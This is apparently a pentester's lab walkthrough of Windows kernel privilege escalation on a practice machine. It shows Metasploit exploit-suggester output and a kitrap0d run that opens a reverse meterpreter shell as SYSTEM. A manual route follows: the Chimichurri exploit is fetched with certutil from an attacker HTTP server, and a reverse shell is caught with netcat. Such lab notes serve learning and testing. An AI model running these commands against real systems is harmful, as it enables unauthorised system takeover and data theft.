List of [exploits](https://github.com/SecWiki/windows-kernel-exploits).
There are multiple ways we can exploit kernel vulnerabilities after identifying them via an [[Automated Tools]] such as **wesng**, or the Metasploit **Exploit suggester**.
## Metasploit
Once we have established a connection to the machine via a meterpreter session we can run `local_exploit_suggester` module to check for existing vulnerabilities.
```bash
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 10.10.14.19:6666
[*] Sending stage (177734 bytes) to 10.10.10.5
[*] Meterpreter session 26 opened (10.10.14.19:6666 -> 10.10.10.5:49172) at 2025-07-08 12:13:33 +1000
meterpreter > run post/multi/recon/local_exploit_suggester
[*] 10.10.10.5 - Collecting local exploits for x86/windows...
[*] 10.10.10.5 - 203 exploit checks are being tried...
[+] 10.10.10.5 - exploit/windows/local/bypassuac_comhijack: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/bypassuac_eventvwr: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move: The service is running, but could not be validated. Vulnerable Windows 7/Windows Server 2008 R2 build detected!
[+] 10.10.10.5 - exploit/windows/local/ms10_015_kitrap0d: The service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms10_092_schelevator: The service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms13_053_schlamperei: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms13_081_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms15_004_tswbproxy: The service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms16_016_webdav: The service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms16_075_reflection: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms16_075_reflection_juicy: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ntusermndragover: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.
[*] Running check method for exploit 42 / 42
[*] 10.10.10.5 - Valid modules for session 26:
=============================
# Name Potentially Vulnerable? Check Result
- ---- ----------------------- ------------
1 exploit/windows/local/bypassuac_comhijack Yes The target appears to be vulnerable.
2 exploit/windows/local/bypassuac_eventvwr Yes The target appears to be vulnerable.
3 exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move Yes The service is running, but could not be validated. Vulnerable Windows 7/Windows Server 2008 R2 build detected!
4 exploit/windows/local/ms10_015_kitrap0d Yes The service is running, but could not be validated.
5 exploit/windows/local/ms10_092_schelevator Yes The service is running, but could not be validated.
6 exploit/windows/local/ms13_053_schlamperei Yes The target appears to be vulnerable.
7 exploit/windows/local/ms13_081_track_popup_menu Yes The target appears to be vulnerable.
8 exploit/windows/local/ms14_058_track_popup_menu Yes The target appears to be vulnerable.
9 exploit/windows/local/ms15_004_tswbproxy Yes The service is running, but could not be validated.
10 exploit/windows/local/ms15_051_client_copy_image Yes The target appears to be vulnerable.
11 exploit/windows/local/ms16_016_webdav Yes The service is running, but could not be validated.
12 exploit/windows/local/ms16_032_secondary_logon_handle_privesc Yes The service is running, but could not be validated.
13 exploit/windows/local/ms16_075_reflection Yes The target appears to be vulnerable.
14 exploit/windows/local/ms16_075_reflection_juicy Yes The target appears to be vulnerable.
15 exploit/windows/local/ntusermndragover Yes The target appears to be vulnerable.
16 exploit/windows/local/ppr_flatten_rec Yes The target appears to be vulnerable.
.
.
.
```
Let's pick the `kitrap0d` vulnerability and try to execute it to gain elevated privileges.
```bash
meterpreter > background
[*] Backgrounding session 27...
msf6 exploit(multi/handler) > use exploit/windows/local/ms10_015_kitrap0d
[*] Using configured payload windows/meterpreter/reverse_tcp
msf6 exploit(windows/local/ms10_015_kitrap0d) > set SESSION 27
SESSION => 27
msf6 exploit(windows/local/ms10_015_kitrap0d) > set LHOST tun0
LHOST => 10.10.14.19
msf6 exploit(windows/local/ms10_015_kitrap0d) > set LPORT 5555
LPOST => 5555
msf6 exploit(windows/local/ms10_015_kitrap0d) > options
Module options (exploit/windows/local/ms10_015_kitrap0d):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION 27 yes The session to run this module on
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 10.10.14.19 yes The listen address (an interface may be specified)
LPORT 5555 yes The listen port
Exploit target:
Id Name
-- ----
0 Windows 2K SP4 - Windows 7 (x86)
msf6 exploit(windows/local/ms10_015_kitrap0d) > run
[*] Started reverse TCP handler on 10.10.14.19:5555
[*] Reflectively injecting payload and triggering the bug...
[*] Launching netsh to host the DLL...
[+] Process 2440 launched.
[*] Reflectively injecting the DLL into 2440...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Sending stage (177734 bytes) to 10.10.10.5
[*] Meterpreter session 28 opened (10.10.14.19:5555 -> 10.10.10.5:49174) at 2025-07-08 12:22:53 +1000
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
```
We have successfully gained administrator privileges in the system. We can now enter into a shell and exfiltrate data from the system.
```PowerShell
meterpreter > shell
whoProcess 3568 created.
Channel 1 created.
amiMicrosoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
c:\windows\system32\inetsrv>whoami
whoami
nt authority\system
```
## Manual Exploitation
If we are manually exploiting a vulnerability, first we can use a tool like `wes` to find exisiting vulnerabilities. In order to this, we can use the `systeminfo` command to obtain the system details and provide them to `wes` as follow.
```bash
$ python wes.py --update
Windows Exploit Suggester 1.05 ( https://github.com/bitsadmin/wesng/ )
[+] Updating definitions
[+] Obtained definitions created at 20250704
$ python wes.py sysinfo.txt -c -s critical
Windows Exploit Suggester 1.05 ( https://github.com/bitsadmin/wesng/ )
[+] Parsing systeminfo output
[+] Operating System
- Name: Windows 7 for 32-bit Systems
- Generation: 7
- Build: 7600
- Version: None
- Architecture: 32-bit
- Installed hotfixes: None
[+] Loading definitions
- Creation date of definitions: 20250704
[+] Determining missing patches
[+] Applying display filters
[!] Found vulnerabilities!
Date: 20130409
CVE: CVE-2013-1296
KB: KB2813347
Title: Vulnerability in Remote Desktop Client Could Allow Remote Code Execution
Affected product: Windows 7 for 32-bit Systems
Affected component: Remote Desktop Connection 7.0 Client
Severity: Critical
Impact: Remote Code Execution
Exploit: n/a
Date: 20130409
CVE: CVE-2013-1338
KB: KB2817183
Title: Cumulative Security Update for Internet Explorer
Affected product: Windows 7 for 32-bit Systems
Affected component: Windows Internet Explorer 9
Severity: Critical
Impact: Remote Code Execution
Exploit: n/a
.
.
```
Once we have a list of possible exploits, we can search the [windows-kernel-exploits](https://github.com/SecWiki/windows-kernel-exploits) GitHub to find ways to execute the exploits. For this machine we will go with the [MS10-059](https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS10-059) exploit. This is commonly known as the **Chimichurri** exploit.
We need to run an executable on the compromised machine and this will spawn and connect a shell with administrator privileges to our machine.
We need to first transfer the file from our machine to the compromised machine.
```bash
$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.5 - - [08/Jul/2025 13:06:15] "GET /Chimichurri.exe HTTP/1.1" 200 -
10.10.10.5 - - [08/Jul/2025 13:06:28] "GET /Chimichurri.exe HTTP/1.1" 200 -
```
```PowerShell
c:\Windows>cd Temp
cd Temp
c:\Windows\Temp>certutil -urlcache -f http://10.10.14.19/Chimichurri.exe ms.exe
certutil -urlcache -f http://10.10.14.19/Chimichurri.exe ms.exe
**** Online ****
CertUtil: -URLCache command completed successfully.
```
Now we simply need to open a lister on port `6667` on our and and wait for the connection.
```PowerShell
c:\Windows\Temp>.\ms.exe
.\ms.exe
/Chimichurri/-->This exploit gives you a Local System shell <BR>/Chimichurri/-->Usage: Chimichurri.exe ipaddress port <BR>
c:\Windows\Temp>.\ms.exe 10.10.14.19 6667
.\ms.exe 10.10.14.19 6667
```
```bash
$ nc -lnvp 6667
listening on [any] 6667 ...
connect to [10.10.14.19] from (UNKNOWN) [10.10.10.5] 49181
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
c:\Windows\Temp>whoami
whoami
nt authority\system
```